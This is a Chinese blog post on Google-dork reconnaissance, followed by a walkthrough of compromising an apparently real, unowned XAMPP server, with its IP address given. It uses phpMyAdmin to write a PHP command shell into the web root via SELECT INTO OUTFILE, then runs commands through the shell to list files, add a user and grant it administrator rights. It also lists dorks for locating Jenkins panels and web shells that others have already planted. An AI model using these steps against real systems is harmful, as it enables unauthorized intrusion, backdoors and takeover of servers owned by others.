Google Hack

最新推荐文章于 2024-08-31 08:50:37 发布
最新推荐文章于 2024-08-31 08:50:37 发布
阅读量339 收藏
点赞数
文章标签: 数据库 python mysql php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43198291/article/details/112198893
版权

1.寻找持续构建工具Jenkins的管理面板

 

为什么要去寻找,因为有我们有可能从中获取某些项目的源代码或者敏感信息

1.谷歌hack的查询语法请参考文章

https://blog.csdn.net/weixin_43198291/article/details/112161738

2.寻找持续构建工具Jenkins的管理面板

例子 

inurl:8080 intitle:"Dashboard[Jenkins]"

URL中存在关键字的网页(inurl)网页标题中的关键字(intitle)

我们随便找一个进去看看

 

接着我们点击一个用户提交的项目,可以看到有一个GitHub图标,进入之后就可以看它的源代码了。

 

2.综合利用各种信息搞定xampp

XAMPP(Apache+MySQL+PHP+PERL)是一个功能强大的建站集成软件包。这个软件包原来的名字是 LAMPP,但是为了避免误解,最新的几个版本就改名为 XAMPP 了。它可以在Windows、Linux、Solaris、Mac OS X 等多种操作系统下安装使用。

寻找安装了xampp的主机:

:inurl:"xampp/index" intext:"XAMPP for Windows"

寻找phpmyadmin不用验证或者弱口令管理页面,通过mysql的root权限插入一句话木马提权,获取服务器管理权限。

我们可以从当这个能看到一些版本信息,建议大家去找1.7.3版本以下的,因为版本越低,安全越低

我们找一个点进去

在这个页面中,可以看到两个非常有用的信息,phpinfo(),phpMyAdmin的管理入口

我们点击phpMyAdmin,返回了错误信息,原因是mysql数据库未开启

有时候运气好的话会直接进入

加下来我们利用phpmyadmain添加一个用户

我们之前已经创建了一个用户root1 ,密码root1

创建一个表

向表里插入一条数据,写一个php,意思是调用cmd程序给系统执行

我们查一下发现已经在里面了

下一步,我们将这句话移动到磁盘里,这就形成了一个后门

select * into outfile '路径/file' from aa

这里重点是将这段php程序移动到网站目录下执行,我们怎么找呢,这个时候就是使用刚才phpinfo信息的时候了。

这个标题有php的一些主要信息

我们认为当前网站页面在C:/xampp/htdocs/xampp这个目录下,我们可以写到这个下面

select * into outfile 'C:/xampp/htdocs/xampp/aa.php' from aa

现在我们去浏览器上访问aa.php文件,右键查看源代码,可以看到,说明成功了

我们现在给对方服务器传一个参数,浏览器就会返回很多目录给我们

http://112.137.163.87/xampp/aa.php?cmd=dir

我们现在在对方服务器创建一个用户

http://112.137.163.87/xampp/aa.php?cmd=net user xxx 123456 /add

然后将普通用户添加到管理用户组里面

http://112.137.163.87/xampp/aa.php?cmd=net localgroup administrators xxx /add

这个时候就可以远程连接了。

3.后门查找

  • Google搜索目标:intitle:"=[ 1n73ct10n privat shell ]="
  • intitle:"WSO 2.4" [Sec.Info],[Files],[Console],[Sql],[Php],[Safe mode],[String tools],[Bruteforce],[Network],[Self remove]

我们随便谷歌一个进入可以看到类似这种

4.关于google hack database

Asiaforest
关注
google hack database(最新版本)
03-07
本文档是最新版本的google hack 语法查阅文档,包含了从最开始到2019.3.7 所搜集的所有google hack 语法示例
论入门可以进行哪些src--核心思想流程
m0_57069925的博客
05-28 163
前文:该文章仅限于学习 本文章不进行具体环节,只进行思想的分享,如有需要可对作者进行关注留意作者的最新文章
Google Hacking Database (GHDB) 开源项目教程
最新发布
gitblog_00426的博客
08-31 1000
Google Hacking Database (GHDB) 开源项目教程 Google-Hacking-Database-GHDBThe GHDB is an index of search queries (we call them dorks) used to find publicly available information, intended for pentesters and ...
google hack
云守护的专栏
05-27 5712
Google Hack Google hacker (Google黑客)是利用GOOGLE提供的搜索功能查找黑客们想找到的信息.一般是查找网站后台,网管的个人信息,也可以用来查找某人在网络上的活动.     Google hacker 一般是做为黑客在入侵时的一个手段.在入侵过程中有时需要查找后台的登陆口就需要用到GOOGLE HACKER.有时猜解密码的时候google也是提供查找管理员资料
google Hack
子曰小玖的博客
02-17 3147
intitle:搜索标题 inurl:搜索url intext:搜索网页正文内容 + 连接 site: 在某网站下搜寻 site:www.any.com+ inurl:admin intext: to parent directory + intext : mdb filetype: ppt,asp,php intext:to parent directory in...
新手小白如何快速挖到第一个漏洞
m0_53844310的博客
02-04 1516
新手小白如何快速挖到第一个漏洞
FTP弱口令渗透测试
明裕学长的博客
05-24 3106
任务环境说明: 服务器场景:Windows 服务器场景操作系统:Windows(版本不详) 渗透机环境说明: BT5渗透机用户名:root密码:toor Kali渗透机用户名:root密码:toor Windows7渗透机用户名:administrator密码:123456 靶机场景Windows--1 172.16.105.249 1.在BT5中使用Zenmap工具扫描服务器场景Windows所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、2
Google Hack V2.0.rar
01-23
Google Hack V2.0:探索与理解网络漏洞利用》 在互联网的广阔天地中,安全问题始终是不可忽视的一环。"Google Hack V2.0"是一个专门针对搜索引擎进行网络安全检测的工具,旨在帮助安全研究人员和黑客发现网络主机...
google HACK
04-15
根据提供的文件信息,标题为“google HACK”,描述中提到了“了解GOOGLE HACK Pagerank算法 google妙用”,而标签是“GOOGLE HACK”。内容部分则是重复提供的电子书下载链接,并提示了版权问题。虽然内容部分并没有...
Google Hack详细使用教程
01-08
googlehack 常用语法 site 指定域名 intext 正文中存在关键字的网页 intitle 标题中存在关键字的网页 info 一些基本信息 inurl URL存在关键字的网页 filetype 搜索指定文件类型 实例演示 1.搜索存在敏感信息的网站 ...
GooGle Hack
08-10
### Google Hack 命令大全详解 在网络安全与信息检索领域,“Google Hack”是指利用Google搜索引擎的强大功能来发现网络上存在的安全漏洞、敏感信息或非公开数据的一种技术。本篇文章将详细介绍一系列常用的Google...
GoogleHack—利用谷歌语法查找网站后台和漏洞
weixin_33924770的博客
06-01 3339
GoogleHack是利用组合关键词,通过谷歌搜索引擎搜索到精确度高、范围广的搜索结果。合理利用关键词的组合形式,会出现的收获,下面,我就带领大家一起来学习一下这个神奇的搜索引擎吧。下面我们先来看看Google的部分语法:①intitle:搜索网页标题中包含有特定字符的网页。例如输入“intitle: cbi”,这样网页标题中带有cbi的网...
网络安全(一 谷歌语法)
Aidang的博客
05-01 1073
‘+’ 指定一个一定存在的关键词 ‘-’ 指定一个一定不存在的关键词 ‘|’ 满足任一条件均可查询 AND 满足两个条件,才可以查询 ======================================= site 搜索指定域名下的结果 准确搜集:目录,文件,子域名 site:xxx.com (搜索的结果更多) site:www.xxx.com inurl 一般用于批量搜索较多...
[网络安全1]常见Google浏览器语法,快速寻找漏洞
weixin_45919207的博客
08-29 1340
[网络安全1]常见Google浏览器语法,快速寻找漏洞简单语法高级语法 简单语法 1.搜索“Mark”且只显示百度内容 Mark + baidu.com 2.搜索“Mark”且不显示百度内容 Mark - baidu.com 3.指定关键字(指定域名) site: QQ.com 4.搜索网络包含的URL site: QQ.com inurl:pvp 5.搜索网络正文的关键字 site: QQ.com inurl:pvp intext:外挂 6.指定一个文件类型 filetype:xls 7.搜索
对于谷歌搜索的一些基本语法整理
a720561252803的博客
07-10 4152
第一步:谷歌介绍 google介绍:google成立于1997年,目前已经成为全球第一搜素公司。Google数据库存有42.8亿个Web文件;检索网页数量达24亿;支持多达132中语言;具有15000多台服务器,200多条T3级宽带;通过采PageRank技术能够提供准确率极高的搜索结果;智能化的“手气不错”提供最符合要求的网站;“网页快照”可以从Google服务器里直接取出缓存的网页;独到的图片...
渗透测试14---shodan和Google hack语法
初遇我ㄖ寸の热情呢?
04-14 8107
什么是shodan?(专门搜设备用的,主要是物联网的设备) Shodan https://www.shodan.io/(在中国对标的网站是:www.zoomeye.org(钟馗之眼)) 是一个搜索引擎,但它与google这种搜索网址的搜索引擎不一样,Shodan是用来搜索网络空间中 在线设备的,你可以通过Shodan搜索指定的设备,或者搜索特定的设备类型,其中Shodan上最受欢迎的搜索内容是:...
谷歌搜索引擎使用语法大全收集
xxx0028的博客
04-28 9227
目录google介绍关于谷歌语法的一些例子Google常用语法踩点:需要收集的十个方面Google的一些入口地址谷歌语法详解需要注意以下几点:详细描述看以下几条链接:最后总结一下:看图片更直观 Google Hack技术是现在最火暴的黑客技术之一。其原理很简单,就是利用搜索引擎强大的搜索能力,来查找一些存在漏洞的网站。要利用Google来查找网站的漏洞自然要学会Google这个搜索引擎的语法了。下...
EL-ADMIN弱口令_Google-hacking和Fofa
soldi_er的博客
03-25 1493
登录页面指纹 收集 <title>登录 - EL-ADMIN</title> 文本:技术支持亿校云 Apache License 2.0 intext:技术支持亿校云 Apache License 搜到的前几条都是Apache相关的结果。 intitle:登录 - EL-ADMIN_前5页 可以登录,但没发现什么有价值的信息。 【√】https://el-admin.xin 【http://www.xxdragon.xyz】admin/admin123 【√】http://ca
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值